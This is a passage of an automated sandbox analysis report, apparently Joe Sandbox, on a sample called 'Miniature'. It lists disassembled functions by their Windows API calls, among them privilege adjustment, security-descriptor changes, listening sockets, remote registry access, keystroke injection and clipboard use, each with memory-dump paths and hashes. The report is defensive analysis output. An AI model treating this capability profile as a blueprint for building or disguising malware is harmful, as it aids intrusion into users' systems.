                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FE8A23
                                                  • CopySid.ADVAPI32(00000000), ref: 00FE8A2A
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FE8A5B
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FE8A81
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FE8A95
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: e57256580c5c45f28cb471151e556461883801fccd697176f45bb7d210f17c59
                                                  • Instruction ID: 8c2bd51bea64c56ea7486b80da97fb8a75b5cfb92b78a971b55e66859c23eccc
                                                  • Opcode Fuzzy Hash: e57256580c5c45f28cb471151e556461883801fccd697176f45bb7d210f17c59
                                                  • Instruction Fuzzy Hash: 74618170900249BFDF20EF92DC85EEEBB79FF04750F14416AF815A6290DB399902DB60
                                                  APIs
                                                    • Part of subcall function 0101147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101040D,?,?), ref: 01011491
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01010B0C
                                                    • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                    • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 01010BAB
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 01010C43
                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01010E82
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 01010E8F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1240663315-0
                                                  • Opcode ID: 706e62fb32d53e5dea554ffeb397c5b0dd4b8f2dd67f656f1db275522f2e7bee
                                                  • Instruction ID: c13febbd44c7a96836c2caf6ed919be1ee9b524669de9f4fd16fc3e0f6487602
                                                  • Opcode Fuzzy Hash: 706e62fb32d53e5dea554ffeb397c5b0dd4b8f2dd67f656f1db275522f2e7bee
                                                  • Instruction Fuzzy Hash: 8CE16D71204310AFDB24DF29C895E2EBBE4FF89714F04856DF889DB269DA39E841CB51
                                                  APIs
                                                  • __swprintf.LIBCMT ref: 00FF4451
                                                  • __swprintf.LIBCMT ref: 00FF445E
                                                    • Part of subcall function 00FB38C8: __woutput_l.LIBCMT ref: 00FB3921
                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00FF4488
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00FF4494
                                                  • LockResource.KERNEL32(00000000), ref: 00FF44A1
                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00FF44C1
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00FF44D3
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00FF44E2
                                                  • LockResource.KERNEL32(?), ref: 00FF44EE
                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00FF454F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                  • String ID:
                                                  • API String ID: 1433390588-0
                                                  • Opcode ID: 415b3b9565a155008b0b6be54ee406a75df9db388d58749815e3d7024a784947
                                                  • Instruction ID: ed00529924f75d9581d3953a4497e9cda2b4178239038bd31f7932b6832ee45f
                                                  • Opcode Fuzzy Hash: 415b3b9565a155008b0b6be54ee406a75df9db388d58749815e3d7024a784947
                                                  • Instruction Fuzzy Hash: B931D27190031AABDB21AF61EC48EBF7BADEF04300F184416FE55E2158D739EA10DBA0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  • Opcode ID: fb21912d31862b42ae84baa46c697870ac2ab6f447240f11262dbe3282b25484
                                                  • Instruction ID: 098e16c156b2656362bd5ff0688c51a277d54bc5d368e90ba656242844d35786
                                                  • Opcode Fuzzy Hash: fb21912d31862b42ae84baa46c697870ac2ab6f447240f11262dbe3282b25484
                                                  • Instruction Fuzzy Hash: E421A3352013109FEB32AF64EC0DF2E77A8EF48711F10805AFA85DB295DB79A901DB94
                                                  APIs
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00FFFA83
                                                  • FindClose.KERNEL32(00000000), ref: 00FFFB96
                                                    • Part of subcall function 00F952B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F952E6
                                                  • Sleep.KERNEL32(0000000A), ref: 00FFFAB3
                                                  • _wcscmp.LIBCMT ref: 00FFFAC7
                                                  • _wcscmp.LIBCMT ref: 00FFFAE2
                                                  • FindNextFileW.KERNEL32(?,?), ref: 00FFFB80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                  • String ID: *.*
                                                  • API String ID: 2185952417-438819550
                                                  • Opcode ID: 5023d1ca6fb484bf1cfa8ff9a9f86664c8d52cb4113dfd265be556aa530e3934
                                                  • Instruction ID: 6a45087a721f1039001cd2114548870a3f6cb0ae3040f0feff59d1c232ad5728
                                                  • Opcode Fuzzy Hash: 5023d1ca6fb484bf1cfa8ff9a9f86664c8d52cb4113dfd265be556aa530e3934
                                                  • Instruction Fuzzy Hash: A8419F71D4021E9FDF24DF64CC59AEEBBB4FF05350F144066E915A22A1EB349A48DB90
                                                  APIs
                                                    • Part of subcall function 00FE9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FE93E3
                                                    • Part of subcall function 00FE9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FE9410
                                                    • Part of subcall function 00FE9399: GetLastError.KERNEL32 ref: 00FE941D
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00FF57B4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-194228
                                                  • Opcode ID: c651f1bae95f3b20cd639372a2d6d72358101dbe7137ec110649b422218d8d19
                                                  • Instruction ID: 971c1e20011245d8a07aa7e0b809737aa0dc567d198df99b75642ce56b9b3e01
                                                  • Opcode Fuzzy Hash: c651f1bae95f3b20cd639372a2d6d72358101dbe7137ec110649b422218d8d19
                                                  • Instruction Fuzzy Hash: C001FC73A5472EEBE73875659C8ABBB7658AF04F50F200125FB53D60F1D5595C00A150
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010069C7
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 010069D6
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 010069F2
                                                  • listen.WSOCK32(00000000,00000005), ref: 01006A01
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 01006A1B
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 01006A2F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                  • String ID:
                                                  • API String ID: 1279440585-0
                                                  • Opcode ID: bfd70e4f53109206e1079e8d1032816a15c6dc9a908918112750daeae3ce0c4f
                                                  • Instruction ID: c095812c35c4b1ec0d5b909260b1562fc2bef7da822a9f23c8f5699804ac6f65
                                                  • Opcode Fuzzy Hash: bfd70e4f53109206e1079e8d1032816a15c6dc9a908918112750daeae3ce0c4f
                                                  • Instruction Fuzzy Hash: 5721F230600201AFEB21EF68CC49B6EB7EAEF45720F108159F896A73D1CB75AC41DB90
                                                  APIs
                                                    • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F91DD6
                                                  • GetSysColor.USER32(0000000F), ref: 00F91E2A
                                                  • SetBkColor.GDI32(?,00000000), ref: 00F91E3D
                                                    • Part of subcall function 00F9166C: DefDlgProcW.USER32(?,00000020,?), ref: 00F916B4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ColorProc$LongWindow
                                                  • String ID:
                                                  • API String ID: 3744519093-0
                                                  • Opcode ID: 36b6f4aabeedade376b96342280134fa035ff3c09caa1451180bfc43a920973f
                                                  • Instruction ID: 6ad1e91023b26437b3725cd672f7bff657145b694c725ee14c5957499b1e228e
                                                  • Opcode Fuzzy Hash: 36b6f4aabeedade376b96342280134fa035ff3c09caa1451180bfc43a920973f
                                                  • Instruction Fuzzy Hash: 85A1447950550BBAFF39AA698D4AFBF369CFB41321F24012FF442C6185CA299C01F276
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00FFC329
                                                  • _wcscmp.LIBCMT ref: 00FFC359
                                                  • _wcscmp.LIBCMT ref: 00FFC36E
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00FFC37F
                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00FFC3AF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 2387731787-0
                                                  • Opcode ID: ecfe4e32dd68e678e88d6c58c58ca0240f811499a70eda1409c476eed90d491b
                                                  • Instruction ID: 981815eeca388ae5798f74f64b85f3ab7cce8388d2b52b60599e29206c560a1d
                                                  • Opcode Fuzzy Hash: ecfe4e32dd68e678e88d6c58c58ca0240f811499a70eda1409c476eed90d491b
                                                  • Instruction Fuzzy Hash: 0751AC75A0461A8FD714DF68C990EAAB3E4FF49320F10421DFA5687361DB34AD05EB91
                                                  APIs
                                                    • Part of subcall function 01008475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010084A0
                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 01006E89
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 01006EB2
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 01006EEB
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 01006EF8
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 01006F0C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 99427753-0
                                                  • Opcode ID: a266ff56dee939fb22921738192d6cf349d3fb4897fc092ee97c03dda38ef4f9
                                                  • Instruction ID: d2fe1f497050b76d7f6a7304948d17b562c2e0b0a6118ac140097507dd834269
                                                  • Opcode Fuzzy Hash: a266ff56dee939fb22921738192d6cf349d3fb4897fc092ee97c03dda38ef4f9
                                                  • Instruction Fuzzy Hash: 5641E475600300AFFF21AF64DC86F7E73E9AB14B14F048459F945AB3C2DA78AD029B91
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: 80c9b0bf1152828b76514fc5568d978c7e06e1e0e51596d0d219f76787d6de20
                                                  • Instruction ID: 93d618d537f78f93c8ce3680938e5c612c18ab259694d2a2c3ba179ecbe731e9
                                                  • Opcode Fuzzy Hash: 80c9b0bf1152828b76514fc5568d978c7e06e1e0e51596d0d219f76787d6de20
                                                  • Instruction Fuzzy Hash: 2311E6323403115FF7315F2A8C84A2E7B99FF86721B504029F885DB249CB7C99018AE1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: LocalTime__swprintf
                                                  • String ID: %.3d$WIN_XPe
                                                  • API String ID: 2070861257-2409531811
                                                  • Opcode ID: f35c36ec185c0cf768e0b51e0ffc1d6debc7c0f086d25a7296f59153e46048b5
                                                  • Instruction ID: fa3132c32f43ddd33dd8776663b215922264f35e242dae829fa430457f4f1c86
                                                  • Opcode Fuzzy Hash: f35c36ec185c0cf768e0b51e0ffc1d6debc7c0f086d25a7296f59153e46048b5
                                                  • Instruction Fuzzy Hash: 56D01273854218FBCB18AA91DC48FF9777DAB04300F680053F546A2104EA359748BB22
                                                  APIs
                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,01001ED6,00000000), ref: 01002AAD
                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01002AE4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                  • String ID:
                                                  • API String ID: 599397726-0
                                                  • Opcode ID: 0eaba120985bb298a3f37f448bc8efe7a1ce5858ba82a8216e650a8815bdc016
                                                  • Instruction ID: a6cd08794b64828b2b65caa133791dec1d7e88cad96cd6a03d22166a41c2a4a3
                                                  • Opcode Fuzzy Hash: 0eaba120985bb298a3f37f448bc8efe7a1ce5858ba82a8216e650a8815bdc016
                                                  • Instruction Fuzzy Hash: 7241F571A00709FFFB22DE59CC89EBFB7ECEB40754F10405AF685A6181DA719E819B60
                                                  APIs
                                                    • Part of subcall function 00FB0FE6: std::exception::exception.LIBCMT ref: 00FB101C
                                                    • Part of subcall function 00FB0FE6: __CxxThrowException@8.LIBCMT ref: 00FB1031
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FE93E3
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FE9410
                                                  • GetLastError.KERNEL32 ref: 00FE941D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1922334811-0
                                                  • Opcode ID: ef25e108083d8bba8603361d59703adb5939f5bf63ca99a6607d6f01bbb6bcff
                                                  • Instruction ID: 0ae3e11462b044f79b97e21c58a1f202a0585b6f0f01309666dbce29fcf17c78
                                                  • Opcode Fuzzy Hash: ef25e108083d8bba8603361d59703adb5939f5bf63ca99a6607d6f01bbb6bcff
                                                  • Instruction Fuzzy Hash: 0311BFB2818304AFE728DF55DCC5D6BB7BCEB44310B20812EF48982280EB74AC41CB60
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FF42FF
                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00FF433C
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FF4345
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                  • String ID:
                                                  • API String ID: 33631002-0
                                                  • Opcode ID: 9b2266ef5331e4692033daf39bc011d906c775fb504f025f8ab023d4769e53ce
                                                  • Instruction ID: ade6b23c2401fdd2f83a2ec134e8f07d492ae0fa3e24d57f5ea33c7f64caaedc
                                                  • Opcode Fuzzy Hash: 9b2266ef5331e4692033daf39bc011d906c775fb504f025f8ab023d4769e53ce
                                                  • Instruction Fuzzy Hash: F81186B2D00229BEE7209AE89C44FBFBBBCEB09720F104156FA14E7190D2756D0497A1
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00FF4F45
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FF4F5C
                                                  • FreeSid.ADVAPI32(?), ref: 00FF4F6C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  • Opcode ID: 4e5310a8e7b714b21e02fc447bbc80980ff836d7b8275f818390669b8293a822
                                                  • Instruction ID: a7b7710a6a645cea92b9c262116091f32d8247eaf3969c356b24760144e7cbd8
                                                  • Opcode Fuzzy Hash: 4e5310a8e7b714b21e02fc447bbc80980ff836d7b8275f818390669b8293a822
                                                  • Instruction Fuzzy Hash: 95F03C7591130CBFEB10DEE09889AAEBBBCEF08211F504469F501E2584D6396A048B50
                                                  APIs
                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00FF1B01
                                                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00FF1B14
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
